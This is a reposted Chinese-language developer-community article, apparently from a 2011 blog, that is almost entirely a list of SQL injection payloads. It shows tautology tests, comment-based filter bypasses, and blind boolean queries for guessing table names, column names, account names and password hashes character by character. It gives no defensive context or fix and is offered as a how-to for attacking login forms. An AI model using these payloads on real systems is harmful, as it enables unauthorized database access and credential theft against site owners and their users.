SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码-阿里云开发者社区

开发者社区> 数据库> 正文
登录阅读全文

SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码

简介:

检查漏洞

1' or 1=1  or ('1' = '1
1' or 1=1)  or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1

猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1


猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1

猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1)  and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' )  and '1' = '1

猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635   and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a')  and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1




本文转自黄聪博客园博客,原文链接:http://www.cnblogs.com/huangcong/archive/2011/07/16/2108073.html,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
数据库
使用钉钉扫一扫加入圈子
+ 订阅

分享数据库前沿,解构实战干货,推动数据库技术变革

其他文章
最新文章
相关文章